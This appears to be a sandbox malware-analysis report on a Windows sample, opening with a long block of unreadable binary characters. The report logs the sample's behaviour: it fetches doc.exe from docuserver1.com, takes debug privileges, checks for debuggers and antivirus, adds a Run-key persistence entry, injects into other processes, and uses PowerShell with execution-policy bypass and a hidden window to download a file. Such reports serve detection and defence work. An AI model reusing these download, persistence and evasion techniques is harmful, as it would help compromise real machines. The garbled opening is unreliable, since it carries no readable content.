7T5êûSh3ß¹èрaCÓ*$ºÀՃ’E²‹Šáõ‹XÈjEWqMö[n?òK'ç’}nyÝé®W&…øVO¡}ÙC¼½drrl+7l:¬„å&ƒŽƬe†92ªð¾-ñEÍTlº„v½¦aæ ¦—_ñ†7`‰v`ƒ²Ü)z Ӈ¦y;°ª7xÏ7yí_YÖì®v vÝ£ 9sç)|ïÈJ}eì„$Éúï†AÈÊ;8qv‹bµ1Ä3Y-¨ß78L]õÐJ;ÕÝ Ç4»k””U˜I-y¥äŽå·Åxz"{»Q\¯pQ ׫œôp¾\k=2ûLöð¸¸6Èÿ‡ÈJȟ¶#öÙ%F ¢‹Ö~WÌمX¬)&µö&MÏv ´ñêv7ä̚/çó  '!é×åžYˆe8k0òJmà†D=„Ø d‡}]x™:ƒE%2K Z ¯d”Ø2ia[t, áÓªe“†L*Ñ¥¥=ˆÎÔÓD -v9N.™ §h;ag^ Ë éÖ*ËUö-Áon+Wº8—º)îÜO‰GÏè;*c¢䣷օê4rÛ¥TŽª;¾Ô.ýzۅ¡uØ pˆÀ¤¶¤ו8ÊÄ*H_Ouì…^œ´¹=½Hù@½).EÚã¯ÑœM\üâJrh§ßÀêæïވ>3µ]B€ä+gÒ*–ê\•wÏm¢Óó(úh4æÆ~lüKM"oςÏÑ},Õ×џaQê!M0Ɛºî}«ºÜãôµÝ<~ýœ×Njé<ï ¸b$ϐ[»Ú69ÜNØäáU&æF[b°â‡ÚÓ*—q0ÊƀÀ—Ô>½³ É4©Ñ(:WÓ ˜~Ã%AKE´T•[á(õõAü´Ù4üù€íË醼ä†vb4¯ª†ö©Ê^T«Ä+šF±ÿ!°x#Ëïÿ¡zö·<³B†èmۆ×aޏÃö³þš´Þȇ“»ü'ya¦3,Þ\`qW™Wëa”5 ¿ûԚ¦Œ’”.IùåÖìâŸò{?ødé˜ï¼u-LV12AwŸÔœüò´zZ[ð'o|!ôôQ(7ˆŽåþ¦…hTŽôtwu¡:®õë‚Üìi}ä6†`Ü×ËTÒ{~Q h“(Mt|•Âa56+\ìDäj®jm6|pj¨îÿ"„%ÓYõ¤i{¿ŸÅqå£$+°¾ñbèÒ?W[Vè?pòô§†`t†,ìÒò
Data sent GET /d/doc.exe HTTP/1.1 Host: docuserver1.com Connection: Keep-Alive
Time & API Arguments Status Return Repeated

LookupPrivilegeValueW

system_name:
privilege_name: SeDebugPrivilege
1 1 0
url http://nsis.sf.net/NSIS_Error
description Escalate priviledges rule Escalate_priviledges
description Take ScreenShot rule ScreenShot
description (no description) rule DebuggerCheck__GlobalFlags
description (no description) rule DebuggerCheck__QueryInfo
description (no description) rule DebuggerHiding__Thread
description (no description) rule DebuggerHiding__Active
description (no description) rule ThreadControl__Context
description (no description) rule SEH__vectored
description Checks if being debugged rule anti_dbg
description Bypass DEP rule disable_dep
reg_key HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\explorer.exe reg_value C:\Users\test22\AppData\Roaming\Temp\word.exe
wmi Select * from AntiVirusProduct
Time & API Arguments Status Return Repeated

send

buffer: GET /d/doc.exe HTTP/1.1 Host: docuserver1.com Connection: Keep-Alive
socket: 1420
sent: 74
1 74 0
Process injection Process 2672 called NtSetContextThread to modify thread in remote process 2704
Time & API Arguments Status Return Repeated

NtSetContextThread

registers.eip: 2000355780
registers.esp: 1638384
registers.edi: 0
registers.eax: 4353015
registers.ebp: 0
registers.edx: 0
registers.ebx: 2130567168
registers.esi: 0
registers.ecx: 0
thread_handle: 0x000001e8
process_identifier: 2704
1 0 0
parent_process powershell.exe martian_process C:\Users\test22\AppData\Local\Temp\EJNFTE.Exe
parent_process powershell.exe martian_process "C:\Users\test22\AppData\Local\Temp\EJNFTE.Exe"
Process injection Process 1160 resumed a thread in remote process 2672
Time & API Arguments Status Return Repeated

NtResumeThread

thread_handle: 0x0000075c
suspend_count: 1
process_identifier: 2672
1 0 0
option -executionpolicy bypass value Attempts to bypass execution policy
option -w hidden value Attempts to execute command with a hidden window
value Uses powershell to execute a file download from the command line
option -executionpolicy bypass value Attempts to bypass execution policy
option -w hidden value Attempts to execute command with a hidden window
value Uses powershell to execute a file download from the command line
file C:\Windows\System32\ie4uinit.exe
file C:\Program Files\Windows Sidebar\sidebar.exe
file C:\Windows\System32\WindowsAnytimeUpgradeUI.exe
file C:\Windows\System32\xpsrchvw.exe
file C:\Windows\System32\displayswitch.exe
file C:\Program Files\Common Files\Microsoft Shared\ink\mip.exe
file C:\Windows\System32\mblctr.exe
file C:\Windows\System32\mstsc.exe
file C:\Windows\System32\SnippingTool.exe
file C:\Windows\System32\SoundRecorder.exe
file C:\Windows\System32\dfrgui.exe
file C:\Windows\System32\msinfo32.exe
file C:\Windows\System32\rstrui.exe
file C:\Program Files\Common Files\Microsoft Shared\ink\ShapeCollector.exe
file C:\Program Files\Windows Journal\Journal.exe
file C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
file C:\Windows\System32\MdSched.exe
file C:\Windows\System32\msconfig.exe
file C:\Windows\System32\recdisc.exe
file C:\Windows\System32\msra.exe
file C:\Users\test22\AppData\Local\Temp\EJNFTE.Exe